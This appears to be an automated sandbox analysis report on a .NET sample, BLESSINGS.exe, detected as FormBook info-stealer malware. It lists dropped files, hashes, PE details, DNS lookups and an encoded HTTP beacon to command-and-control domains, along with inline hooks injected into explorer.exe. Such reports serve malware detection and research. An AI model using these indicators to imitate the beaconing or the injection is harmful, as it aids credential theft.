                                                                            Process:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1451
                                                                            Entropy (8bit):5.345862727722058
                                                                            Encrypted:false
                                                                            SSDEEP:24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84G1qE4j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovGm
                                                                            MD5:06F54CDBFEF62849AF5AE052722BD7B6
                                                                            SHA1:FB0250AAC2057D0B5BCE4CE130891E428F28DA05
                                                                            SHA-256:4C039B93A728B546F49C47ED8B448D40A3553CDAABB147067AEE3958133CB446
                                                                            SHA-512:34EF5F6D5EAB0E5B11AC81F0D72FC56304291EDEEF6D19DF7145FDECAB5D342767DBBC0B4384B8DECB5741E6B85A4B431DF14FBEB5DDF2DEE103064D2895EABB
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                            C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Process:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):42080
                                                                            Entropy (8bit):6.2125074198825105
                                                                            Encrypted:false
                                                                            SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                            MD5:F2A47587431C466535F3C3D3427724BE
                                                                            SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                            SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                            SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: QP-0766.scr.exe, Detection: malicious, Browse
                                                                            • Filename: order-181289654312464648.exe, Detection: malicious, Browse
                                                                            • Filename: PO_60577.exe, Detection: malicious, Browse
                                                                            • Filename: IMG_73344332#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                                                            • Filename: Doc#6620200947535257653.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Generic.mg.15368412abd71685.exe, Detection: malicious, Browse
                                                                            • Filename: RT-05723.exe, Detection: malicious, Browse
                                                                            • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                            • Filename: cFAWQ1mv83.exe, Detection: malicious, Browse
                                                                            • Filename: I7313Y5Rr2.exe, Detection: malicious, Browse
                                                                            • Filename: SWIFT-COPY Payment advice3243343.exe, Detection: malicious, Browse
                                                                            • Filename: bWVvaTptgL.exe, Detection: malicious, Browse
                                                                            • Filename: umOXxQ9PFS.exe, Detection: malicious, Browse
                                                                            • Filename: BL,IN&PL.exe, Detection: malicious, Browse
                                                                            • Filename: ORDER #0554.exe, Detection: malicious, Browse
                                                                            • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                            • Filename: IMG_84755643#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                            • Filename: 8WLxD8uxRN.exe, Detection: malicious, Browse
                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.56178131875686
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:BLESSINGS.exe
                                                                            File size:3427840
                                                                            MD5:30cb872994e8a0a4a635b06bfbe38006
                                                                            SHA1:02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
                                                                            SHA256:d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
                                                                            SHA512:57bc48f7c2e77d28f13cd52dadeaa24a50a8eafb0316c2b7894e49cbe17fb16f14efe4f7b7568ef3ae40c7e6ec0a07862ec9bd91541be477795f7c113a4816d1
                                                                            SSDEEP:98304:p+F0ah/YomABaKJCmwLyxWIyzhIpJj7d29wYG:p+FPheKcqo3+V7
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..N.................B4.........~`4.. ........@.. ........................4...........`................................

                                                                            File Icon

                                                                            Icon Hash:00828e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x74607e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                            Time Stamp:0x4EC1C53F [Tue Nov 15 01:49:51 2011 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3460280x53.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3480000x62a.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x34a0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000x3440840x344200unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x3480000x62a0x800False0.35595703125data3.6771719498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x34a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_VERSION0x3480a00x3a0data
                                                                            RT_MANIFEST0x3484400x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            LegalCopyrightCopyright 2008 AIBD4G:CFD:@><<=EI4<8
                                                                            Assembly Version1.0.0.0
                                                                            InternalNameBLESSINGS.exe
                                                                            FileVersion6.9.12.16
                                                                            CompanyNameAIBD4G:CFD:@><<=EI4<8
                                                                            Comments4H793ADH@:58D93JC7C3EG
                                                                            ProductNameI@J9GGA7CBDA=H:I8@
                                                                            ProductVersion6.9.12.16
                                                                            FileDescriptionI@J9GGA7CBDA=H:I8@
                                                                            OriginalFilenameBLESSINGS.exe

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 13, 2021 21:26:23.389085054 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.433885098 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.436270952 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.436424017 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.481056929 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.510871887 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.510904074 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.511102915 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.511132002 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.555875063 CET804975591.195.241.137192.168.2.6

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 13, 2021 21:24:06.328990936 CET5606153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:06.376877069 CET53560618.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:07.145781040 CET5833653192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:07.196732998 CET53583368.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:08.151783943 CET5378153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:08.199799061 CET53537818.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:09.111212015 CET5406453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:09.161999941 CET53540648.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:09.951495886 CET5281153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:10.002197027 CET53528118.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:11.236196995 CET5529953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:11.284121037 CET53552998.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:12.289843082 CET6374553192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:12.342294931 CET53637458.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:13.346986055 CET5005553192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:13.394896030 CET53500558.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:14.592904091 CET6137453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:14.643692017 CET53613748.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:15.728138924 CET5033953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:15.776109934 CET53503398.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:35.984093904 CET6330753192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:36.032093048 CET53633078.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:40.249634027 CET4969453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:40.309444904 CET53496948.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:54.042809010 CET5498253192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:54.103244066 CET53549828.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:56.545470953 CET5001053192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:56.602050066 CET53500108.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:01.855648041 CET6371853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:01.915158033 CET53637188.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:04.826375961 CET6211653192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:04.885246992 CET53621168.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:05.572345018 CET6381653192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:05.622982025 CET53638168.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:06.189363956 CET5501453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:06.240117073 CET53550148.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:06.947381973 CET6220853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:07.006567001 CET53622088.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:07.615426064 CET5757453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:07.642710924 CET5181853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:07.671602964 CET53575748.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:07.710135937 CET53518188.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:08.327656984 CET5662853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:08.383883953 CET53566288.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:09.497463942 CET6077853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:10.538269043 CET6077853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:10.644700050 CET5379953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:11.267458916 CET53607788.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:11.646994114 CET5379953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:11.707711935 CET53537998.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:12.463759899 CET5468353192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:12.512481928 CET53546838.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:12.983732939 CET5932953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:13.040106058 CET53593298.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:39.331732988 CET6402153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:39.394530058 CET53640218.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:41.298754930 CET5612953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:41.346676111 CET53561298.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:42.776345015 CET5817753192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:42.847879887 CET53581778.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:26:02.693787098 CET5070053192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:26:02.767628908 CET53507008.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:26:23.308008909 CET5406953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:26:23.383419991 CET53540698.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:27:04.839895010 CET6117853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:27:04.901885986 CET53611788.8.8.8192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Jan 13, 2021 21:26:02.693787098 CET192.168.2.68.8.8.80x38eeStandard query (0)www.toweroflifeinc.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:26:23.308008909 CET192.168.2.68.8.8.80xa42bStandard query (0)www.quintred.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:27:04.839895010 CET192.168.2.68.8.8.80x9d11Standard query (0)www.hotvidzhub.downloadA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Jan 13, 2021 21:26:02.767628908 CET8.8.8.8192.168.2.60x38eeName error (3)www.toweroflifeinc.comnonenoneA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:26:23.383419991 CET8.8.8.8192.168.2.60xa42bNo error (0)www.quintred.com91.195.241.137A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:27:04.901885986 CET8.8.8.8192.168.2.60x9d11Name error (3)www.hotvidzhub.downloadnonenoneA (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.quintred.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.64975591.195.241.13780C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:26:23.436424017 CET4866OUTGET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1
                                                                            Host: www.quintred.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:26:23.510871887 CET4866INHTTP/1.1 302 Found
                                                                            date: Wed, 13 Jan 2021 20:26:23 GMT
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 0
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_T0oGji8ZbUDKitk7mvz/5w6qRssSn9oqweHEj3JMisRyq1Qoa/dizZly+qRNB2xY3VlNem/76Rnt308qbdhrGw==
                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            pragma: no-cache
                                                                            last-modified: Wed, 13 Jan 2021 20:26:23 GMT
                                                                            location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                            x-cache-miss-from: parking-6d4775b86f-szbgp
                                                                            server: NginX
                                                                            connection: close


                                                                            Code Manipulations

                                                                            User Modules

                                                                            Hook Summary

                                                                            Function NameHook TypeActive in Processes
                                                                            PeekMessageAINLINEexplorer.exe
                                                                            PeekMessageWINLINEexplorer.exe
                                                                            GetMessageWINLINEexplorer.exe
                                                                            GetMessageAINLINEexplorer.exe

                                                                            Processes

                                                                            Process: explorer.exe, Module: user32.dll
                                                                            Function NameHook TypeNew Data
                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE2
                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE2
                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE2
                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE2

                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: BLESSINGS.exe PID: 4588 Parent PID: 5948

                                                                            General

                                                                            Start time:21:24:12
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\BLESSINGS.exe'
                                                                            Imagebase:0x710000
                                                                            File size:3427840 bytes
                                                                            MD5 hash:30CB872994E8A0A4A635B06BFBE38006
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: AddInProcess32.exe PID: 6264 Parent PID: 4588

                                                                            General

                                                                            Start time:21:24:47
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Imagebase:0xb60000
                                                                            File size:42080 bytes
                                                                            MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Antivirus matches:
                                                                            • Detection: 0%, Metadefender, Browse
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:moderate

                                                                            Chronological Activities

                                                                            Analysis Process: explorer.exe PID: 3440 Parent PID: 6264

                                                                            General

                                                                            Start time:21:24:52
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff6f22f0000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: raserver.exe PID: 6744 Parent PID: 3440

                                                                            General

                                                                            Start time:21:25:13
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                            Imagebase:0xd90000
                                                                            File size:108544 bytes
